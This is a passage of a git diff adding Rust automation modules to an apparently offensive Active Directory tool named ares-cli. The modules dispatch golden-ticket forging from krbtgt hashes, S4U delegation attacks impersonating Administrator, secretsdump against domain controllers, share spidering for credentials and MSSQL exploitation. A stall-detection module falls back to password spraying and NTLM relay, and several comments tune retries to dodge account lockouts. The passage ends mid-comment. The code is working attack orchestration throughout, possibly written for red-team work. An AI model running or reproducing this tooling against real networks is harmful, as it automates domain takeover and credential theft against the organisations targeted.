.await; + + // Cache the resolved SID and admin name + if let Some((ref sid, ref admin_name)) = result { + info!(domain = %domain, sid = %sid, admin = admin_name.as_deref().unwrap_or("Administrator"), "Domain SID resolved via lookupsid"); + let op_id = { dispatcher.state.read().await.operation_id.clone() }; + let reader = ares_core::state::RedisStateReader::new(op_id); + let mut conn = dispatcher.queue.connection(); + if let Err(e) = reader + .set_domain_sid(&mut conn, &domain.to_lowercase(), sid) + .await + { + warn!(err = %e, "Failed to persist domain SID to Redis"); + } + if let Some(ref name) = admin_name { + if let Err(e) = reader + .set_admin_name(&mut conn, &domain.to_lowercase(), name) + .await + { + warn!(err = %e, "Failed to persist admin name to Redis"); + } + } + let mut state = dispatcher.state.write().await; + state.domain_sids.insert(domain.to_lowercase(), sid.clone()); + if let Some(ref name) = admin_name { + state + .admin_names + .insert(domain.to_lowercase(), name.clone()); + } + } + + domain_sid = result.map(|(sid, _)| sid); + } + } + + let domain_sid = match domain_sid { + Some(sid) => sid, + None => { + warn!(domain = %domain, "Cannot resolve domain SID — skipping golden ticket"); + continue; + } + }; + + // Use cached RID-500 name, defaulting to "Administrator" when unknown. + let admin_username = { + let state = dispatcher.state.read().await; + state + .admin_names + .get(&domain.to_lowercase()) + .cloned() + .unwrap_or_else(|| "Administrator".to_string()) + }; + + // ── Build and submit golden ticket task ───────────────────────── + // Strip LM prefix if hash is in "lm:ntlm" format — ticketer expects + // a single 32-char NTLM hex string, not the LM:NTLM pair. + let ntlm_hash = match krbtgt.hash_value.rsplit_once(':') { + Some((_, ntlm)) if ntlm.len() == 32 => ntlm.to_string(), + _ => krbtgt.hash_value.clone(), + }; + + let mut payload = json!({ + "technique": "golden_ticket", + "vuln_type": "golden_ticket", + "domain": domain, + "krbtgt_hash": ntlm_hash, + "username": admin_username, + "domain_sid": domain_sid, + }); + if let Some(ip) = dc_ip { + payload["dc_ip"] = json!(ip); + } + if let Some(ref cred) = admin_cred { + payload["admin_password"] = json!(cred.password); + payload["admin_domain"] = json!(cred.domain); + } + if let Some(ref hash) = admin_hash { + payload["admin_hash"] = json!(hash.hash_value); + payload["admin_domain"] = + json!(admin_cred.as_ref().map_or(&hash.domain, |c| &c.domain)); + } + if let Some(ref aes) = krbtgt.aes_key { + payload["aes_key"] = json!(aes); + } + + match dispatcher + .throttled_submit("exploit", "privesc", payload, 1) + .await + { + Ok(Some(task_id)) => { + info!(task_id = %task_id, domain = %domain, "Golden ticket task dispatched"); + // Mark has_golden_ticket immediately to prevent re-dispatch. + // The result processing will also confirm on task completion + // (detects "Saving ticket in *.ccache" in tool output). + if let Err(e) = dispatcher + .state + .set_golden_ticket(&dispatcher.queue, &domain) + .await + { + warn!(err = %e, "Failed to set golden ticket flag after dispatch"); + } + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch golden ticket"), + } + } +} + +/// Resolve domain SID and RID-500 account name by calling `impacket-lookupsid`. +/// Returns `(domain_sid, Option)`. Tries password credential first, +/// then NTLM hash. +/// +/// Uses the credential's own domain for NTLM auth (not the target domain) so +/// cross-domain trust authentication works — e.g. a `child.contoso.local` +/// cred can resolve the SID of `contoso.local` via its parent DC. +async fn resolve_domain_sid( + _domain: &str, + dc_ip: &str, + password_cred: Option<&ares_core::models::Credential>, + admin_hash: Option<&ares_core::models::Hash>, +) -> Option<(String, Option)> { + // Try password auth first — use the credential's native domain for auth + if let Some(cred) = password_cred { + let auth_domain = if cred.domain.is_empty() { + _domain + } else { + &cred.domain + }; + let args = json!({ + "domain": auth_domain, + "username": cred.username, + "password": cred.password, + "dc_ip": dc_ip, + }); + match ares_tools::privesc::get_sid(&args).await { + Ok(output) => { + let text = output.combined_raw(); + if let Some(sid) = ares_core::parsing::extract_domain_sid(&text) { + let admin_name = ares_core::parsing::extract_rid500_name(&text); + return Some((sid, admin_name)); + } + warn!(auth_domain = %auth_domain, user = %cred.username, "lookupsid succeeded but no SID pattern found in output"); + } + Err(e) => { + warn!(err = %e, user = %cred.username, auth_domain = %auth_domain, "lookupsid with password failed"); + } + } + } + + // Fall back to hash auth — use the hash's native domain for auth + if let Some(hash) = admin_hash { + let auth_domain = if hash.domain.is_empty() { + _domain + } else { + &hash.domain + }; + let args = json!({ + "domain": auth_domain, + "username": "Administrator", + "hash": hash.hash_value, + "dc_ip": dc_ip, + }); + match ares_tools::privesc::get_sid(&args).await { + Ok(output) => { + let text = output.combined_raw(); + if let Some(sid) = ares_core::parsing::extract_domain_sid(&text) { + let admin_name = ares_core::parsing::extract_rid500_name(&text); + return Some((sid, admin_name)); + } + warn!(auth_domain = %auth_domain, "lookupsid (hash) succeeded but no SID pattern found"); + } + Err(e) => { + warn!(err = %e, auth_domain = %auth_domain, "lookupsid with admin hash failed"); + } + } + } + + None +} diff --git a/ares-cli/src/orchestrator/automation/mod.rs b/ares-cli/src/orchestrator/automation/mod.rs new file mode 100644 index 00000000..3768130b --- /dev/null +++ b/ares-cli/src/orchestrator/automation/mod.rs @@ -0,0 +1,64 @@ +//! Background automation tasks. +//! +//! Each `auto_*` function is a long-running tokio task that periodically checks +//! the shared state and dispatches new tasks when conditions are met. All follow +//! the same pattern: +//! +//! 1. Sleep for an interval (configurable) +//! 2. Take a read lock, collect new work items +//! 3. Release lock, submit tasks via the dispatcher +//! 4. Mark items as processed (write lock + Redis persist) +//! +//! This mirrors the Python `_orchestrator.py` background tasks but eliminates +//! all threading hacks since tokio tasks are truly concurrent. + +mod acl; +mod adcs; +mod bloodhound; +mod coercion; +mod crack; +mod credential_access; +mod credential_expansion; +mod delegation; +mod gmsa; +mod golden_ticket; +mod mssql; +mod refresh; +mod s4u; +mod secretsdump; +mod share_enum; +mod shares; +mod stall_detection; +mod trust; +mod unconstrained; + +// Re-export all public task functions at the same paths they had before the split. +pub use acl::auto_acl_chain_follow; +pub use adcs::auto_adcs_enumeration; +pub use bloodhound::auto_bloodhound; +pub use coercion::auto_coercion; +pub use crack::auto_crack_dispatch; +pub use credential_access::auto_credential_access; +pub use credential_expansion::auto_credential_expansion; +pub use delegation::auto_delegation_enumeration; +pub use gmsa::auto_gmsa_extraction; +pub use golden_ticket::auto_golden_ticket; +pub use mssql::auto_mssql_detection; +pub use refresh::state_refresh; +pub use s4u::auto_s4u_exploitation; +pub use secretsdump::auto_local_admin_secretsdump; +pub use share_enum::auto_share_enumeration; +pub use shares::auto_share_spider; +pub use stall_detection::auto_stall_detection; +pub use trust::auto_trust_follow; +pub use unconstrained::auto_unconstrained_exploitation; + +pub(crate) fn crack_dedup_key(hash: &ares_core::models::Hash) -> String { + let prefix = &hash.hash_value[..32.min(hash.hash_value.len())]; + format!( + "{}:{}:{}", + hash.domain.to_lowercase(), + hash.username.to_lowercase(), + prefix + ) +} diff --git a/ares-cli/src/orchestrator/automation/mssql.rs b/ares-cli/src/orchestrator/automation/mssql.rs new file mode 100644 index 00000000..9f6fd8d2 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/mssql.rs @@ -0,0 +1,94 @@ +//! auto_mssql_detection -- detect MSSQL services on hosts. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; + +/// Scans hosts for MSSQL services (port 1433) and queues exploitation vulns. +/// Interval: 30s. Matches Python `_auto_mssql_detection`. +pub async fn auto_mssql_detection( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + let work: Vec<(String, String)> = { + let state = dispatcher.state.read().await; + state + .hosts + .iter() + .filter(|h| { + h.services + .iter() + .any(|s| s.contains("1433") || s.to_lowercase().contains("mssql")) + }) + .filter(|h| !state.mssql_enum_dispatched.contains(&h.ip)) + .map(|h| (h.ip.clone(), h.hostname.clone())) + .collect() + }; + + for (ip, hostname) in work { + let vuln = ares_core::models::VulnerabilityInfo { + vuln_id: format!("mssql_{}", ip.replace('.', "_")), + vuln_type: "mssql_access".to_string(), + target: ip.clone(), + discovered_by: "auto_mssql_detection".to_string(), + discovered_at: chrono::Utc::now(), + details: { + let mut d = std::collections::HashMap::new(); + d.insert("target_ip".to_string(), json!(ip)); + if !hostname.is_empty() { + d.insert("hostname".to_string(), json!(hostname)); + // Extract domain from FQDN: "sql01.fabrikam.local" → "fabrikam.local" + if let Some(dot_pos) = hostname.find('.') { + let domain = &hostname[dot_pos + 1..]; + if !domain.is_empty() { + d.insert("domain".to_string(), json!(domain)); + } + } + } + d + }, + recommended_agent: "lateral".to_string(), + priority: 4, + }; + + match dispatcher + .state + .publish_vulnerability(&dispatcher.queue, vuln) + .await + { + Ok(true) => { + info!(ip = %ip, "MSSQL service detected — vulnerability queued"); + dispatcher + .state + .write() + .await + .mssql_enum_dispatched + .insert(ip.clone()); + let _ = dispatcher + .state + .persist_mssql_dispatched(&dispatcher.queue, &ip) + .await; + } + Ok(false) => {} // already exists + Err(e) => warn!(err = %e, "Failed to publish MSSQL vulnerability"), + } + } + } +} diff --git a/ares-cli/src/orchestrator/automation/refresh.rs b/ares-cli/src/orchestrator/automation/refresh.rs new file mode 100644 index 00000000..27dceefb --- /dev/null +++ b/ares-cli/src/orchestrator/automation/refresh.rs @@ -0,0 +1,32 @@ +//! state_refresh -- periodic refresh of state from Redis. + +use std::sync::Arc; +use std::time::Duration; + +use tokio::sync::watch; +use tracing::warn; + +use crate::orchestrator::dispatcher::Dispatcher; + +/// Periodically refreshes state from Redis to pick up worker-published discoveries. +/// Interval: 10s. +pub async fn state_refresh(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(10)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + // Skip first tick + interval.tick().await; + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if let Err(e) = dispatcher.state.refresh_from_redis(&dispatcher.queue).await { + warn!(err = %e, "State refresh failed"); + } + } +} diff --git a/ares-cli/src/orchestrator/automation/s4u.rs b/ares-cli/src/orchestrator/automation/s4u.rs new file mode 100644 index 00000000..0f4f269c --- /dev/null +++ b/ares-cli/src/orchestrator/automation/s4u.rs @@ -0,0 +1,354 @@ +//! auto_s4u_exploitation -- exploit delegation vulnerabilities via S4U. +//! +//! When constrained or RBCD delegation vulnerabilities are discovered (via +//! `find_delegation` or BloodHound), this automation dispatches S4U attacks +//! using available credentials for the delegating account. +//! +//! NOTE: Unconstrained delegation is handled by `auto_unconstrained_exploitation` +//! which orchestrates the coerce → dump → secretsdump chain. + +use std::collections::HashMap; +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tokio::time::Instant; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; + +/// Cooldown after a failed S4U attempt before retrying the same vuln. +/// Set to 5 minutes to wait for AD account lockout to expire. +const S4U_FAILURE_COOLDOWN: Duration = Duration::from_secs(300); + +/// Maximum consecutive failures before giving up on a vuln. +/// Set higher than the expected number of spray-induced lockouts +/// so that S4U can eventually succeed once sprays stop re-locking. +const S4U_MAX_FAILURES: u32 = 6; + +/// Kerberos/SMB errors that indicate an account is permanently disabled/revoked. +/// These should permanently block the vuln — no point retrying. +const PERMANENT_REVOCATION_PATTERNS: &[&str] = &["STATUS_ACCOUNT_DISABLED", "KDC_ERR_KEY_EXPIRED"]; + +/// Kerberos/SMB errors that indicate a temporary lockout. +/// These should count as failures but NOT permanently block — the lockout expires. +const LOCKOUT_PATTERNS: &[&str] = &["KDC_ERR_CLIENT_REVOKED", "STATUS_ACCOUNT_LOCKED_OUT"]; + +/// Monitors for delegation vulnerabilities and dispatches S4U attacks. +/// Interval: 20s. +pub async fn auto_s4u_exploitation( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let deleg_notify = dispatcher.delegation_notify.clone(); + let cred_notify = dispatcher.credential_access_notify.clone(); + let mut interval = tokio::time::interval(Duration::from_secs(20)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + // Track dispatch attempts per vuln to prevent infinite retry loops. + // Maps vuln_id -> (last_dispatch_time, failure_count) + let mut dispatch_tracker: HashMap = HashMap::new(); + + // Track task_id -> vuln_id so we can check completed task results for + // revocation errors and immediately stop retrying those vulns. + let mut task_vuln_map: HashMap = HashMap::new(); + + loop { + // Wake on: timer tick, new delegation vuln, OR new credential (so S4U fires + // immediately when a constrained delegation account's password is cracked). + tokio::select! { + _ = interval.tick() => {}, + _ = deleg_notify.notified() => {}, + _ = cred_notify.notified() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + // Check completed tasks for revocation/lockout errors. + // - Permanent revocation (disabled account) → block forever. + // - Temporary lockout → just count the failure, let cooldown handle retry. + { + let state = dispatcher.state.read().await; + let finished: Vec = task_vuln_map + .keys() + .filter(|tid| state.completed_tasks.contains_key(tid.as_str())) + .cloned() + .collect(); + for tid in finished { + if let Some(result) = state.completed_tasks.get(&tid) { + if has_permanent_revocation(result) { + if let Some(vid) = task_vuln_map.remove(&tid) { + warn!( + task_id = %tid, + vuln_id = %vid, + "S4U blocked: account permanently disabled — no further retries" + ); + dispatch_tracker.entry(vid).or_insert((Instant::now(), 0)).1 = + S4U_MAX_FAILURES; + } + } else if has_lockout_error(result) { + if let Some(vid) = task_vuln_map.remove(&tid) { + debug!( + task_id = %tid, + vuln_id = %vid, + "S4U lockout detected — will retry after cooldown" + ); + // Don't increment failure count beyond what dispatch already counted. + // The cooldown timer is already set from dispatch time. + } + } else { + // Success or non-revocation error — reset failure count so + // subsequent dispatches aren't permanently blocked by the + // S4U_MAX_FAILURES threshold. + if let Some(vid) = task_vuln_map.remove(&tid) { + if let Some(entry) = dispatch_tracker.get_mut(&vid) { + entry.1 = 0; + } + } + } + } + } + } + + let work: Vec = { + let state = dispatcher.state.read().await; + + // Skip if already domain admin + if state.has_domain_admin { + continue; + } + + state + .discovered_vulnerabilities + .values() + .filter_map(|vuln| { + let vtype = vuln.vuln_type.to_lowercase(); + if vtype != "constrained_delegation" && vtype != "rbcd" { + return None; + } + + // Already exploited? + if state.exploited_vulnerabilities.contains(&vuln.vuln_id) { + return None; + } + + // Check dispatch cooldown — skip if recently dispatched and failed + if let Some((last_time, failures)) = dispatch_tracker.get(&vuln.vuln_id) { + if *failures >= S4U_MAX_FAILURES { + debug!( + vuln_id = %vuln.vuln_id, + failures = *failures, + "S4U skipped: max failures reached" + ); + return None; + } + if last_time.elapsed() < S4U_FAILURE_COOLDOWN { + return None; // Still in cooldown + } + } + + // Extract the delegating account name from details + let account_name = vuln + .details + .get("account_name") + .and_then(|v| v.as_str()) + .or_else(|| vuln.details.get("AccountName").and_then(|v| v.as_str())) + .map(|s| s.to_string()); + + let target_spn = vuln + .details + .get("delegation_target") + .and_then(|v| v.as_str()) + .or_else(|| { + vuln.details + .get("AllowedToDelegate") + .and_then(|v| v.as_str()) + }) + .map(|s| s.to_string()); + + // Find a credential or hash for the delegating account + let credential = account_name.as_ref().and_then(|acct| { + state + .credentials + .iter() + .find(|c| c.username.to_lowercase() == acct.to_lowercase()) + .cloned() + }); + + let hash = account_name.as_ref().and_then(|acct| { + state + .hashes + .iter() + .find(|h| { + h.username.to_lowercase() == acct.to_lowercase() + && h.hash_type.to_uppercase() == "NTLM" + }) + .cloned() + }); + + // Need at least a credential or hash to perform S4U + if credential.is_none() && hash.is_none() { + debug!( + vuln_id = %vuln.vuln_id, + vuln_type = %vuln.vuln_type, + account = ?account_name, + "S4U skipped: no credential or hash for delegating account" + ); + return None; + } + + // Resolve domain and DC IP + let domain = credential + .as_ref() + .map(|c| c.domain.clone()) + .or_else(|| hash.as_ref().map(|h| h.domain.clone())) + .unwrap_or_default(); + + let dc_ip = state + .domain_controllers + .get(&domain.to_lowercase()) + .cloned(); + + Some(S4uWork { + vuln: vuln.clone(), + credential, + hash, + target_spn, + domain, + dc_ip, + }) + }) + .collect() + }; + + for item in work { + let mut payload = json!({ + "technique": "s4u_attack", + "vuln_type": item.vuln.vuln_type, + "target": item.vuln.target, + "domain": item.domain, + "impersonate": "Administrator", + }); + + if let Some(ref spn) = item.target_spn { + payload["target_spn"] = json!(spn); + } + if let Some(ref dc) = item.dc_ip { + payload["target_ip"] = json!(dc); + } + + // Attach credential or hash — provide both flat fields (for prompt + // builders) and nested credential object (for structured extraction). + if let Some(ref cred) = item.credential { + payload["username"] = json!(cred.username); + payload["password"] = json!(cred.password); + payload["account_name"] = json!(cred.username); + payload["credential"] = json!({ + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }); + } else if let Some(ref hash) = item.hash { + payload["hash"] = json!(hash.hash_value); + payload["username"] = json!(hash.username); + if let Some(ref aes) = hash.aes_key { + payload["aes_key"] = json!(aes); + } + } + + let vuln_id = item.vuln.vuln_id.clone(); + // Attach vuln_id so result processing can mark_exploited on success + payload["vuln_id"] = json!(&vuln_id); + + // Priority 10 = highest — S4U must run before other agents use the + // credential and potentially lock out the account. + match dispatcher + .throttled_submit("exploit", "privesc", payload, 10) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + vuln_id = %vuln_id, + vuln_type = %item.vuln.vuln_type, + "S4U exploitation dispatched" + ); + // Record dispatch — increment failure count (reset on next success). + // The cooldown prevents rapid re-dispatch if it fails. + let entry = dispatch_tracker + .entry(vuln_id.clone()) + .or_insert((Instant::now(), 0)); + entry.0 = Instant::now(); + entry.1 += 1; + // Track task → vuln so we can check for revocation on completion. + task_vuln_map.insert(task_id, vuln_id); + } + Ok(None) => { + debug!(vuln_id = %vuln_id, "S4U task deferred by throttler"); + } + Err(e) => { + warn!(err = %e, vuln_id = %vuln_id, "Failed to dispatch S4U exploit") + } + } + } + } +} + +struct S4uWork { + vuln: ares_core::models::VulnerabilityInfo, + credential: Option, + hash: Option, + target_spn: Option, + domain: String, + dc_ip: Option, +} + +/// Check whether a task result matches any of the given error patterns. +fn result_matches_patterns(result: &ares_core::models::TaskResult, patterns: &[&str]) -> bool { + let payload = match &result.result { + Some(v) => v, + None => return false, + }; + + // Check error field + if let Some(err) = &result.error { + if patterns.iter().any(|p| err.contains(p)) { + return true; + } + } + + // Check raw tool outputs (array of strings embedded in the result payload) + if let Some(outputs) = payload.get("tool_outputs").and_then(|v| v.as_array()) { + for output in outputs { + if let Some(text) = output.as_str() { + if patterns.iter().any(|p| text.contains(p)) { + return true; + } + } + } + } + + // Check summary/result text + for key in &["summary", "output", "tool_output"] { + if let Some(text) = payload.get(*key).and_then(|v| v.as_str()) { + if patterns.iter().any(|p| text.contains(p)) { + return true; + } + } + } + + false +} + +/// Account is permanently disabled — no point retrying. +fn has_permanent_revocation(result: &ares_core::models::TaskResult) -> bool { + result_matches_patterns(result, PERMANENT_REVOCATION_PATTERNS) +} + +/// Account is temporarily locked out — will unlock after AD lockout duration. +fn has_lockout_error(result: &ares_core::models::TaskResult) -> bool { + result_matches_patterns(result, LOCKOUT_PATTERNS) +} diff --git a/ares-cli/src/orchestrator/automation/secretsdump.rs b/ares-cli/src/orchestrator/automation/secretsdump.rs new file mode 100644 index 00000000..c8f62138 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/secretsdump.rs @@ -0,0 +1,98 @@ +//! auto_local_admin_secretsdump -- secretsdump with admin creds. + +use std::sync::Arc; +use std::time::Duration; + +use tokio::sync::watch; +use tracing::{info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Dispatches secretsdump when admin credentials are detected. +/// Interval: 30s. Matches Python `_auto_local_admin_secretsdump`. +pub async fn auto_local_admin_secretsdump( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + // Collect credentials with passwords + target DCs. + // Do NOT gate on is_admin — the credential may have admin rights we + // haven't confirmed yet. Secretsdump will fail fast if it lacks + // privileges, but when it succeeds it's the fastest path to krbtgt. + // IMPORTANT: only target DCs in the credential's domain (or child + // domains). Cross-domain secretsdump attempts generate failed auths + // that trigger AD account lockout. + let work: Vec<(String, String, ares_core::models::Credential)> = { + let state = dispatcher.state.read().await; + let creds: Vec<_> = state + .credentials + .iter() + .filter(|c| !c.domain.is_empty() && !c.password.is_empty()) + // Skip delegation accounts — secretsdump will always fail + // (non-admin) and wastes auth budget reserved for S4U. + .filter(|c| c.is_admin || !state.is_delegation_account(&c.username)) + .filter(|c| !state.is_credential_quarantined(&c.username, &c.domain)) + .cloned() + .collect(); + + let mut items = Vec::new(); + for cred in &creds { + let cred_domain = cred.domain.to_lowercase(); + for (dc_domain, dc_ip) in state.domain_controllers.iter() { + let d = dc_domain.to_lowercase(); + // Same domain, child domain, or parent domain + if d == cred_domain + || d.ends_with(&format!(".{cred_domain}")) + || cred_domain.ends_with(&format!(".{d}")) + { + let dedup = format!( + "{}:{}:{}", + dc_ip, + cred.domain.to_lowercase(), + cred.username.to_lowercase() + ); + if !state.is_processed(DEDUP_SECRETSDUMP, &dedup) { + items.push((dedup, dc_ip.clone(), cred.clone())); + } + } + } + } + items + }; + + for (dedup_key, dc_ip, cred) in work.into_iter().take(3) { + let priority = if cred.is_admin { 2 } else { 5 }; + match dispatcher + .request_secretsdump(&dc_ip, &cred, priority) + .await + { + Ok(Some(task_id)) => { + info!(task_id = %task_id, dc = %dc_ip, user = %cred.username, "Admin secretsdump dispatched"); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_SECRETSDUMP, dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_SECRETSDUMP, &dedup_key) + .await; + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch secretsdump"), + } + } + } +} diff --git a/ares-cli/src/orchestrator/automation/share_enum.rs b/ares-cli/src/orchestrator/automation/share_enum.rs new file mode 100644 index 00000000..749c3851 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/share_enum.rs @@ -0,0 +1,106 @@ +//! auto_share_enumeration -- enumerate SMB shares on discovered hosts using credentials. + +use std::sync::Arc; +use std::time::Duration; + +use tokio::sync::watch; +use tracing::{info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Dispatches share enumeration on each known host when credentials are available. +/// Interval: 20s. Dedup key: "{host_ip}:{cred_user}:{cred_domain}". +pub async fn auto_share_enumeration( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(20)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + let mut no_cred_logged = false; + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + let work: Vec<(String, String, ares_core::models::Credential)> = { + let state = dispatcher.state.read().await; + // Use first non-delegation credential to avoid burning auth budget + // on accounts reserved for S4U exploitation. + let cred = match state + .credentials + .iter() + .find(|c| { + !state.is_delegation_account(&c.username) + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .or_else(|| state.credentials.first()) + { + Some(c) => { + no_cred_logged = false; + c.clone() + } + None => { + if !no_cred_logged { + info!( + hosts = state.hosts.len(), + target_ips = state.target_ips.len(), + "Share enum: no credentials in memory yet, waiting" + ); + no_cred_logged = true; + } + continue; + } + }; + + // Enumerate shares on every known host (target IPs + discovered hosts) + let mut ips: Vec = state.target_ips.clone(); + for host in &state.hosts { + if !ips.contains(&host.ip) { + ips.push(host.ip.clone()); + } + } + + ips.into_iter() + .filter_map(|ip| { + let dedup = format!( + "{}:{}:{}", + ip, + cred.username.to_lowercase(), + cred.domain.to_lowercase() + ); + if state.is_processed(DEDUP_SHARE_ENUM, &dedup) { + None + } else { + Some((dedup, ip, cred.clone())) + } + }) + .take(5) + .collect() + }; + + for (dedup_key, host_ip, cred) in work { + match dispatcher.request_share_enumeration(&host_ip, &cred).await { + Ok(Some(task_id)) => { + info!(task_id = %task_id, host = %host_ip, "Share enumeration dispatched"); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_SHARE_ENUM, dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_SHARE_ENUM, &dedup_key) + .await; + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch share enumeration"), + } + } + } +} diff --git a/ares-cli/src/orchestrator/automation/shares.rs b/ares-cli/src/orchestrator/automation/shares.rs new file mode 100644 index 00000000..ccc50320 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/shares.rs @@ -0,0 +1,82 @@ +//! auto_share_spider -- spider readable shares for credentials. + +use std::sync::Arc; +use std::time::Duration; + +use tokio::sync::watch; +use tracing::{debug, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Spiders readable shares for credentials using available creds. +/// Interval: 30s. Matches Python `_auto_share_spider`. +pub async fn auto_share_spider(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + let work: Vec<(String, String, String, ares_core::models::Credential)> = { + let state = dispatcher.state.read().await; + // Use first non-delegation credential to avoid burning auth budget + // on accounts reserved for S4U exploitation. + let cred = match state + .credentials + .iter() + .find(|c| { + !state.is_delegation_account(&c.username) + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .or_else(|| state.credentials.first()) + { + Some(c) => c.clone(), + None => continue, + }; + + state + .shares + .iter() + .filter(|s| { + let perms = s.permissions.to_uppercase(); + perms.contains("READ") && !s.name.to_uppercase().ends_with('$') + }) + .filter_map(|s| { + let dedup = format!("{}:{}:{}:{}", s.host, s.name, cred.username, cred.domain); + if state.is_processed(DEDUP_SPIDERED_SHARES, &dedup) { + None + } else { + Some((dedup, s.host.clone(), s.name.clone(), cred.clone())) + } + }) + .take(3) // limit batch size + .collect() + }; + + for (dedup_key, host, share, cred) in work { + match dispatcher.request_share_spider(&host, &share, &cred).await { + Ok(Some(task_id)) => { + debug!(task_id = %task_id, host = %host, share = %share, "Share spider dispatched"); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_SPIDERED_SHARES, dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_SPIDERED_SHARES, &dedup_key) + .await; + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch share spider"), + } + } + } +} diff --git a/ares-cli/src/orchestrator/automation/stall_detection.rs b/ares-cli/src/orchestrator/automation/stall_detection.rs new file mode 100644 index 00000000..cffd5768 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/stall_detection.rs @@ -0,0 +1,248 @@ +//! auto_stall_detection -- detect when the operation is stuck and take action. +//! +//! When no new credentials or hashes have been discovered for a configurable +//! period (default: 5 minutes), this automation triggers fallback actions: +//! +//! 1. Re-attempt password spray with discovered users +//! 2. Start responder + NTLM relay if not already running +//! 3. Re-run LDAP description search with all known creds +//! +//! This prevents the operation from idling when all easy wins are exhausted. + +use std::sync::Arc; +use std::time::{Duration, Instant}; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// How long without new discoveries before we consider the op stalled. +const STALL_THRESHOLD: Duration = Duration::from_secs(180); // 3 minutes + +/// Minimum interval between stall recovery actions. +const RECOVERY_COOLDOWN: Duration = Duration::from_secs(120); // 2 minutes + +/// Monitors for discovery stalls and triggers fallback actions. +/// Interval: 60s. +pub async fn auto_stall_detection( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(60)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + let start = Instant::now(); + let mut last_cred_count = 0usize; + let mut last_hash_count = 0usize; + let mut last_change = Instant::now(); + let mut last_recovery = Instant::now() - RECOVERY_COOLDOWN; // allow immediate first recovery + let mut recovery_attempts = 0u32; + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + // Don't check stall in the first 3 minutes (let initial recon complete) + if start.elapsed() < Duration::from_secs(180) { + continue; + } + + let (cred_count, hash_count, has_da, has_creds, has_users, has_dcs) = { + let state = dispatcher.state.read().await; + ( + state.credentials.len(), + state.hashes.len(), + state.has_domain_admin, + !state.credentials.is_empty(), + !state.users.is_empty(), + !state.domain_controllers.is_empty(), + ) + }; + + // Skip if we've achieved domain admin + if has_da { + continue; + } + + // Check if there has been progress + if cred_count > last_cred_count || hash_count > last_hash_count { + last_cred_count = cred_count; + last_hash_count = hash_count; + last_change = Instant::now(); + recovery_attempts = 0; // Reset on progress + continue; + } + + // Not stalled yet + if last_change.elapsed() < STALL_THRESHOLD { + continue; + } + + // Cooldown between recovery actions + if last_recovery.elapsed() < RECOVERY_COOLDOWN { + continue; + } + + // Cap recovery attempts (don't spam indefinitely) + if recovery_attempts >= 10 { + continue; + } + + info!( + stall_duration_secs = last_change.elapsed().as_secs(), + cred_count, + hash_count, + recovery_attempt = recovery_attempts + 1, + "Operation stall detected — triggering fallback actions" + ); + + last_recovery = Instant::now(); + recovery_attempts += 1; + + // --- Fallback 1: Password spray with 